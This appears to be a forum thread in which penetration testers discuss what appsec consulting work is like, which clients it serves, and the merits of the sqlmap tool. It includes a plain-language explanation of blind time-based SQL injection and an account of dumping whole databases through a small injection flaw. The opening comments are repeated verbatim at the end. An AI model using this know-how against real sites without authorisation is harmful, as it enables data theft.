I worked as an IT security consultant for a bit over a year and found it rather boring after a while. In theory, you do lots of interesting and different things, get to know many different technologies. Maybe it was just the job I was working at, but the actual penetration testing became pretty boring after a few months.
While it sounds compelling to beat up startups, startups are probably not the clients. Our consulting day rates were very expensive and usually only large corporations or the government could afford it.
You just go and check for the top OWASP vulnerabilities. Sometimes, it requires some creativity, but oftentimes, you get a "feeling" for a web app after a while. Many PHP projects, many open source software projects that got a few custom made plugins. And then it's a bit dull. Testing every single parameter of a web app with many attack vectors...
I have to admit that there was one guy at our company who did a lot of reverse engineering, iOS security, testing a DRM system for an ebook online library (key takeaway: you can't control the client. DRM makes it harder, but it is never impossible to crack the system as long as the hardware is not custom made or something), stuff like that. So this was quite challenging and changing, but this was rare.
One gem I want to add to the original post: If you're interested in SQL injection, check out sqlmap. That tool is a real breaker and worked wonders for us and we downloaded entire databases by having a tiny little sql injection vulnerability in the signup form of a newsletter or something like that.
We work with lots of startups. We work with big companies, too, but that work is disproportionately with big west coast tech companies. The "east coast" BigCo work we do touches on trading protocols and order routing systems, which is fun for a lot of other reasons (wider application domain for findings, extremely high impact, complicated systems with message-oriented middleware, non-web inputs).
We do zero government work.
I don't feel like we're along in appsec shops for having this mix. I think one possible difference is between pure appsec shops like us, iSec Partners, IOActive, and Stach & Liu, versus general security practices. The work at general security practices might be more of a drag.
It's also the case that network security, being a race to the bottom (with Nessus and Metasploit "scanner jockies" and the like) is actively trying to push up into appsec. Maybe the web appsec work at a place like that is boring? We take it pretty seriously.
We avoid tools like sqlmap.
I'm answering this on the off chance that the conversation is a good glimpse into the working life of an appsec pentester (since that's what Cody's writing about).
> Maybe the web appsec work at a place like that is boring? We take it pretty seriously.
Could be. Your work description sounds different though. We did use Nessus and Metasploit for some things, but not for web app security, since ALL these tools suck on a web app security level. They do stupid request-response analysis and they usually have no capability to hold some sort of state, which gets increasingly important in modern web apps.
> We avoid tools like sqlmap.
I think there's actually no other tool like sqlmap. Sqlmap is pure gold as a time saver and also capability-wise. Exploiting a blind time-based SQL vulnerability manually is a pain. Why not use a good tool for that?
If you want to be super careful, just hook up Burp between sqlmap and the target host and check every statement manually. Still better than typing it out.
Note for non-security guys: Blind means that you don't get an error message from the host, which should be the default. Time-based means that you craft some SQL statements that take longer than other statements to get an idea which statement is true. So you could ask something like "does user 1 in table 1 start with letter a-f? if so, return it, if not, wait 3 seconds". This way, you get true or false based on the time it takes the host to respond.
Still, if you're interested in web app security, go and try it out. But if you feel you're some sort of pentesting monkey that does the same stuff day-in day-out, better leave and chase something more interesting :)
I think there's actually no other tool like sqlmap.
But there is no tool that will come close to competing with a top-notch pentester on a SQLi hunt. Automated tools just don't cut it. There is nothing like watching First Blood in action.
While it sounds compelling to beat up startups, startups are probably not the clients. Our consulting day rates were very expensive and usually only large corporations or the government could afford it.
You just go and check for the top OWASP vulnerabilities. Sometimes, it requires some creativity, but oftentimes, you get a "feeling" for a web app after a while. Many PHP projects, many open source software projects that got a few custom made plugins. And then it's a bit dull. Testing every single parameter of a web app with many attack vectors...
I have to admit that there was one guy at our company who did a lot of reverse engineering, iOS security, testing a DRM system for an ebook online library (key takeaway: you can't control the client. DRM makes it harder, but it is never impossible to crack the system as long as the hardware is not custom made or something), stuff like that. So this was quite challenging and changing, but this was rare.
One gem I want to add to the original post: If you're interested in SQL injection, check out sqlmap. That tool is a real breaker and worked wonders for us and we downloaded entire databases by having a tiny little sql injection vulnerability in the signup form of a newsletter or something like that.